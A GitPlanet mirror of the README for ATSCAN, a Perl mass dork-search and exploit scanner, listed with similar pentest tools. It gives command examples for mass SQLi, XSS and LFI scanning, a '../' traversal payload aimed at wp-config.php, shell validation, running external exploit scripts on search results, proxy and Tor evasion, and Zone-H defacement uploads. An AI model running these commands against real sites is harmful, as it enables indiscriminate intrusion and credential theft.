GitPlanet

Cheap and reliable Node.js hosting starts at $3/month, and $1/month static HTML hosting

Created with love in Canada, visit hostnodejs.com today

Feel like to post an Ad? Learn Details
All Projects → AlisamTechnology → Atscan

AlisamTechnology / Atscan

Licence: mit
Advanced dork Search & Mass Exploit Scanner

Programming Languages

shell
77523 projects
perl
6916 projects

Labels

linuxsecurityserverdatatoolsscannerengineweb-applicationexploitationsystemxssvulnerability-scannerssqli

Projects that are alternatives of or similar to Atscan

Berserker
A list of useful payloads for Web Application Security and Pentest/CTF
Stars: ✭ 212 (-74.05%)
Mutual labels:  web-application, scanner, xss, sqli
V3n0m Scanner
Popular Pentesting scanner in Python3.6 for SQLi/XSS/LFI/RFI and other Vulns
Stars: ✭ 847 (+3.67%)
Mutual labels:  scanner, xss, vulnerability-scanners, sqli
Whour
Tool for information gathering, IPReverse, AdminFInder, DNS, WHOIS, SQLi Scanner with google.
Stars: ✭ 18 (-97.8%)
Mutual labels:  scanner, vulnerability-scanners, sqli
Hacking
hacker, ready for more of our story ! 🚀
Stars: ✭ 413 (-49.45%)
Mutual labels:  scanner, vulnerability-scanners, tools
Blackwidow
A Python based web application scanner to gather OSINT and fuzz for OWASP vulnerabilities on a target website.
Stars: ✭ 887 (+8.57%)
Mutual labels:  scanner, xss, sqli
Reconftw
reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities
Stars: ✭ 974 (+19.22%)
Mutual labels:  scanner, xss, sqli
Arachni
Web Application Security Scanner Framework
Stars: ✭ 2,942 (+260.1%)
Mutual labels:  web-application, scanner, xss
Securitymanageframwork
Security Manage Framwork is a security management platform for enterprise intranet, which includes asset management, vulnerability management, account management, knowledge base management, security scanning automation function modules, and can be used for internal security management. This platform is designed to help Party A with fewer security personnel, complicated business lines, difficult periodic inspection and low automation to better achieve internal safety management.
Stars: ✭ 378 (-53.73%)
Mutual labels:  scanner, vulnerability-scanners
Gascontent
Repo to gather all Gameplay Ability System content for UE4
Stars: ✭ 398 (-51.29%)
Mutual labels:  engine, system
Hellraiser
Vulnerability scanner using Nmap for scanning and correlating found CPEs with CVEs.
Stars: ✭ 413 (-49.45%)
Mutual labels:  scanner, vulnerability-scanners
Appinfoscanner
一款适用于以HW行动/红队/渗透测试团队为场景的移动端(Android、iOS、WEB、H5、静态网站)信息收集扫描工具,可以帮助渗透测试工程师、攻击队成员、红队成员快速收集到移动端或者静态WEB站点中关键的资产信息并提供基本的信息输出,如:Title、Domain、CDN、指纹信息、状态信息等。
Stars: ✭ 424 (-48.1%)
Mutual labels:  scanner, tools
Pentestkit
Useful tools and scripts during Penetration Testing engagements
Stars: ✭ 463 (-43.33%)
Mutual labels:  system, tools
Hack Tools
hack tools
Stars: ✭ 488 (-40.27%)
Mutual labels:  vulnerability-scanners, tools
Wssat
WEB SERVICE SECURITY ASSESSMENT TOOL
Stars: ✭ 360 (-55.94%)
Mutual labels:  scanner, xss
Iblessing
iblessing is an iOS security exploiting toolkit, it mainly includes application information collection, static analysis and dynamic analysis. It can be used for reverse engineering, binary analysis and vulnerability mining.
Stars: ✭ 326 (-60.1%)
Mutual labels:  scanner, vulnerability-scanners
Sifter
Sifter aims to be a fully loaded Op Centre for Pentesters
Stars: ✭ 403 (-50.67%)
Mutual labels:  scanner, exploitation
Jstarcraft Rns
专注于解决推荐领域与搜索领域的两个核心问题:排序预测(Ranking)和评分预测(Rating). 为相关领域的研发人员提供完整的通用设计与参考实现. 涵盖了70多种排序预测与评分预测算法,是最快最全的Java推荐与搜索引擎.
Stars: ✭ 324 (-60.34%)
Mutual labels:  engine, system
Raptor
Web-based Source Code Vulnerability Scanner
Stars: ✭ 314 (-61.57%)
Mutual labels:  scanner, vulnerability-scanners
Joomscan
OWASP Joomla Vulnerability Scanner Project
Stars: ✭ 640 (-21.66%)
Mutual labels:  scanner, vulnerability-scanners
Scanners Box
A powerful hacker toolkit collected more than 10 categories of open source scanners from Github - 安全行业从业者自研开源扫描器合辑
Stars: ✭ 5,590 (+584.21%)
Mutual labels:  scanner, vulnerability-scanners
View All Similar Projects ➔

ATSCAN SCANNER

Advanced Mass Search / Dork / Exploitation Scanner

Alisam Technology is not responsible for any misuse, damage caused by this script or attacking targets without prior mutual consent! It is your responsibility to obey laws!
Codename: 4n0n4t
AUTHOR: Ali MEHDIOUI
GROUP: [email protected]
Description:

● Engines: [Google apis cache] Bing Ask Yandex Sogou Exalead Shodan
● Mass Dork Search
● Multiple instant scans.
● Mass Exploitation
● Use proxy.
● Random user agent.
● Random engine.
● Mass Extern commands execution.
● Exploits and issues search.
● XSS / SQLI / LFI / AFD scanner.
● Filter wordpress & Joomla sites.
● Wordpress theme and plugin detection.
● Find Admin page.
● Decode / Encode Base64 / MD5

● Ports scan.
● Collect IPs
● Collect E-mails.
● Auto detect errors.
● Auto detect forms.
● Auto detect Cms.
● Post data.
● Auto sequence repeater.
● Validation.
● Post and Get method
● IP Localisation
● Issues and Exploit search
● Interactive and Normal interface.
● And more...

★ Libreries to install:
Perl Required.
Works in all platforms. Disponible in Blackarch and Dracos Linux.
Download:
● git clone https://github.com/AlisamTechnology/ATSCAN
● direct link: https://github.com/AlisamTechnology/ATSCAN
Permissions:
cd ATSCAN
chmod +x ./atscan.pl
Installation:
chmod +x ./install.sh
./install.sh
Execution:
Portable Execution: perl ./atscan.pl
Installed Tool Execution: atscan
Menu: Applications > Web Application analysis > atscan
Repair Tool:
atscan --repair
Uninstall Tool:
atscan --uninstall
Commands:
--help / -h Help.
--proxy Set tor proxy for scans [EX: --proxy "socks4://localhost:9050"]
Set proxy [EX: --proxy "http://12.45.44.2:8080"]
Set proxy list [EX: --proxy file]
--prandom Random proxy [EX: --prandom file] or --prandom "socks://localhost:9050"]
--motor / -m bing google ask yandex sogou exalead googleapis googlecache or all
--apikey Apikey
--cx Googleapis ID
--mrandom Random of given engines
--brandom Random all disponibles agents
--freq Random time frequency (in seconds)
--time set browser time out
--dork / -d Dork to search [Ex: house [OTHER]cars [OTHER]hotel]
--target / -t Target
--level / -l Scan level (Number of results pages to scan)
--zone Search engine country.
--param / -p Set test parameter EX:id,cat,product_ID
--save / -s Output.
--source Html output file
--bugtraq Serach exploits and issues
--content Print request content
--data Post and Get forms. See examples
--vshell Validate by url ex: --HOST/shell.php or file
--post Use post method
--get Use get method
--header Set headers
--fullHeaders Print full request headers
--host Domain name [Ex: site.com]
--nobanner Hide tool banner
--beep Produce beep sound if positive scan found.
--ifend Produce beep sound when scan process is finished.
--noverbose No scan verbose.
--ping Host ping.
--limit Limit max positive scan results.
--valid / -v Validate by string at least 1 is matching
--validAll Validate all given strings
--status Validate by http header status
--server Validate by server
--ifinurl Get targets with exact string matching
--sregex Get targets with exact regex matching
--exclude Get targets where strings do not exist in html
--excludeAll Get targets where all strings do not exist in html
--unique Get targets with exact dork matching
--replace Replace exact string
--replaceFROM Replace from string to the end of target
--exp / -e Exploit/Payload will be added to full target
--expHost Exploit will be added to the host
--expIp Exploit will be added to the host ip
--xss Xss scan
--sql Sqli scan
--lfi Local file inclusion
--joomrfi Scan for joomla local file inclusion.
--shell Shell link [Ex: http://www.site.com/shell.txt]
--wpafd Scan wordpress sites for arbitrary file download
--admin Get site admin page
--shost Get site subdomains
--port port
--tcp TCP port
--udp UDP port
--getlinks Get target html links
--wp Wordpress site
--joom Joomla site
--zip Get zip files
--md5 Convert to md5
--encode64 Encode base64 string
--decode64 decode base64 string
--TARGET Will be replaced by target in extern command
--HOST Will be replaced by host in extern command
--HOSTIP Will be replaced by host IP in extern command
--PORT Will be replaced by open port in extern command
--ips Collect Ips
--geoloc Ip geolocalisation
--regex Crawl to get strings matching regex
--noquery Remove string value from Query url [ex: site.com/index.php?id=string]
--command / -c Extern Command to execute
--popup Execute Extern Command in new terminal window
--zoneH Upload to Zone-H
--saveCookie Cookies output file
--setCookies Cookie file
--email Collect emails
rang(x-y) EX: --expHost "/index.php?id=rang(1-9)" --sql OR -t "site.com/index.php?id=rang(1-9)" --sql
site.com/index.php?id=1 -> 9.
repeat(txt-y) EX: --expHost "/index.php?id=repeat(../-9)wp-config.php" --sql OR -t "site.com/index.php?id=../wp-config.php"
In site.com/index.php?id=../wp-config.php then site.com/index.php?id=../../wp-config.php 9 times
[OTHER] To separate values ex: dork1 [OTHER]DORK2 [OTHER]DORK3
--googleapi Google Apis
--shodan Shodan search
--count Search Shodan without Results
--count Search Shodan
--dnsreverset Shodan Reverse DNS Lookup
--dnsresolve Shodan Resolve DNS Lookup
--tokens String filters and parameters
--querysearch Search the directory of saved Shodan search queries
--query List the saved Shodan search queries
--querytags List the most popular Shodan tags
--myip List all services that Shodan crawls
--services List all services that Shodan crawls
--apinfo My Shodan API Plan Information
--ports List of port numbers that the crawlers are looking for
--protocols List all protocols that can be used when performing on-demand Internet scans via Shodan.
--honeyscore Calculates honeypot score ranging from 0 (not a honeypot) to 1.0 (is a honeypot) in shodan
--facets Shodan search facets
--update Update tool
--repair Repair or force tool update.
--tool / -? Tool info.
--config User configuration.
--interactive / -i Interactive mode interface.
--uninstall Uninstall Tool.
Examples:
PROXY:
Tor: --proxy [proxy] [Ex: --proxy socks://localhost:9050].
Proxy: Proxy: --proxy [proxy] Ex: http://12.32.1.5:8080
or --proxy file Ex: --proxy my_proxies.txt
RANDOM:
Random proxy: --prandom [proxy file]
Random browser: --brandom
Random engine: --mrandom [ENGINES]
SET HEADERS:
atscan --dork [dork / dorks.txt] --level [level] --header "Authorization => 'Basic YWRtaW46YWRtaW4', keep_alive => '1'"
atscan -t target --data "name=>username, email=>xxxxxx, pass=>xxxxx" --post --header "Authorization => 'Basic YWRtaW46YWRtaW4', keep_alive => '1'"
SEARCH ENGINE:
Search: atscan --dork [dork] --level [level]
Search: atscan -d [dork] -l [level] --getlinks
Set engine: atscan --dork [dork] --level [level] -m bing or google,ask,yandex or all
Set selective engines: atscan -d [dork] -l [level] -m google,bing,..
Search with many dorks: atscan --dork dork1 [OTHER]dork2 [OTHER]dork3] --level [level]
Get Server wordpress sites: atscan -t [target] --wp
Search + output: atscan --dork [dorks.txt] --level [level] --save
Search + get emails: atscan -d [dorks.txt] -l [level] --email
Search + get site emails: atscan --dork site:site.com --level [level] --email
Search + get ips: atscan --dork [dork] --level [level] --ips
REGULAR EXPRESSIONS:
Regex use: atscan [--dork [dork> / -t [target]] --level [level] --regex [regex]
IP: ((?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){ 3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?))
E-mails: '((([A-Za-z0-9]+_+)|([A-Za-z0-9]+\-+)|([A-Za-z0-9]+\.+)|([A-Za-z0-9]+\++))*[A-Za-z0-9][email protected]((\w+\-+)|(\w+\.))*\w{1,63}\.[a-zA-Z]{2,6})'
REPEATER:
atscan -t site.com?index.php?id=rang(1-10) --sql
atscan -t [target] --expHost "/index.php?id=rang(1-10)" --sql
atscan -t [target] --expHost "/index.php?id=repeat(../-9)wp-config.php"
PORTS
atscan -t [ip] --port [port] [--udp / --tcp]
atscan -t (ip start)-(ip end) --port [port] [--udp / --tcp]
atscan -t [ip] --port (port start)-(port end) [--udp / --tcp] --command "your extern command"
ENCODE / DECODE:
Generate MD5: --md5 [string]
Encode base64: --encode64 [string]
Decode base64: --decode64 [string]
DATA:
Data: atscan -t [target] --data "field1=>value1, field2=>value2, field3=>value3" [--post / --get /]
Exploit: --exp/expHost --data "field1=>value1, field2=>value2, field3=>value3" --vshell [shell path] -v [string] / --status [code] [--post / --get / --upload]
Wordlist: --data "field1=>value1, field2=>WORDLIST:" --vshell [shell path] -v [string] / --status [code] [--post / --get]
EXTERNAL COMMANDS:
atscan --dork [dork / dorks.txt] --level [level] --command "curl -v --TARGET"
atscan --dork [dork / dorks.txt] --level [level] --command "file"
atscan --dork [dork / dorks.txt] --level [level] --command "curl -v --HOST"
atscan --dork [dork / dorks.txt] --level [level] --command "nmap -sV -p 21,22,80 --HOSTIP"
atscan -d "index of /lib/scripts/dl-skin.php" -l 2 -m bing --command "php WP-dl-skin.php-exploit.php --TARGET"
atscan --shodan --search [string] --apikey [API KEY] -command [extern_command]
MULTIPLE SCANS:
atscan --dork [dork> --level [10] --sql --lfi --wp ..
atscan --dork [dork> --level [10] --replace [string => new_string] --exp/expHost [payload] [--sql / --lfi / --wp /...]
atscan -t [ip] --level [10] [--sql / --lfi / --wp /...]
atscan -t [target] [--sql / --lfi / --wp /...]
IP LOCALISATION:
atscan -t [ip/target] --geoloc
SEARCH VALIDATION:
atscan -d [dork / dorks.txt] -l [level] --status [code] / --valid [string/file]
atscan -d [dork / dorks.txt] -l [level] --status [code] / --valid [string/file]
atscan -d [dork / dorks.txt] -l [level] --status [code] / --exclude [string/file]
atscan -d [dork / dorks.txt] -l [level] --ifinurl [string]
atscan -d [dork / dorks.txt] -l [level] --sregex [regex] --valid [string]
atscan -d [dork / dorks.txt] -l [level] --regex [regex] --valid [string]
atscan -d [dork / dorks.txt] -l [level] --unique
atscan -t [target / targets.txt] [--status [code] / --valid [string]
atscan -t [target / targets.txt] --vshell [file path]
atscan -d [dork / dorks.txt] -l [level] --exp/expHost [payload] --status [code] / --valid [string]
atscan -d [dorks.txt] -l [level] --replace [string => new_string] --status [code] / --valid [string]
atscan -d [dork / dorks.txt] -l [level] [--admin / --sql ..] --status [code] / --valid [string]
atscan -d [dorks.txt] -l [level] --replace [string => new_string] --status [code] / --valid [string]
atscan -d [dorks.txt] -l [level] --replaceFROM [string => new_string] --status [code] / --valid [string]
atscan -d [dorks.txt] -l [level] --replace [string => new_string] --exp/expHost [payload] --status [code] / --valid [string]
atscan -d [dork / dorks.txt] -l [level] [--sql / --shost ..] --status [code] / --valid [string]
atscan -t [target / targets.txt] --valid [string] --exclude [string]
ZONE-H:
atscan -t [target / targets.txt] -v [string] --zoneH "notifier => --HOST/index.php"
SEARCH EXPLOITS:
atscan --bugtraq -d [string] -l 1 EX: atscan --bugtraq -d wordpress -l 1
atscan --bugtraq -d file.txt -l 1
atscan --bugtraq -d [string] -l 1--limit 10
GOOGLEAPIS SEARCH
atscan --dork [string or file] -l 1 --apikey [API KEY] --cx [ID]
atscan --dork [string or file] -l 1 --apikey [API KEY] --cx [ID] -v [string]
atscan --dork [string or file] -l 1 --apikey [API KEY] --cx [ID] --exp [exploit]
atscan --dork [string or file] -l 1 --apikey [API KEY] --cx [ID] [ANY APTION]
SHODAN SEARCH
atscan --shodan --targget [ip or host or file] --apikey [API KEY]
atscan --shodan --dork [string or file] --apikey [API KEY]
atscan --shodan --dnsresolve [ip or host or file] --apikey [API KEY]
atscan --shodan --dnsrevese [ip or host or file] --apikey [API KEY]
atscan --shodan --count [query or file] --apikey [API KEY]
atscan --shodan --query --apikey [API KEY]
atscan --shodan --querysearch [query or file] --apikey [API KEY]
atscan --shodan --querytags --apikey [API KEY]
atscan --shodan --myip --apikey [API KEY]
atscan --shodan --apinfo --apikey [API KEY]
atscan --shodan --services --apikey [API KEY]
atscan --shodan --ports --apikey [API KEY]
atscan --shodan --tokens [string or file] --apikey [API KEY]
UPDATE TOOL:
atscan --update
UNINSTALL TOOL:
atscan --uninstall
THANKS TO:
Blackarch linux & Dragos Os developers to incorporate my project in their systems.
Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].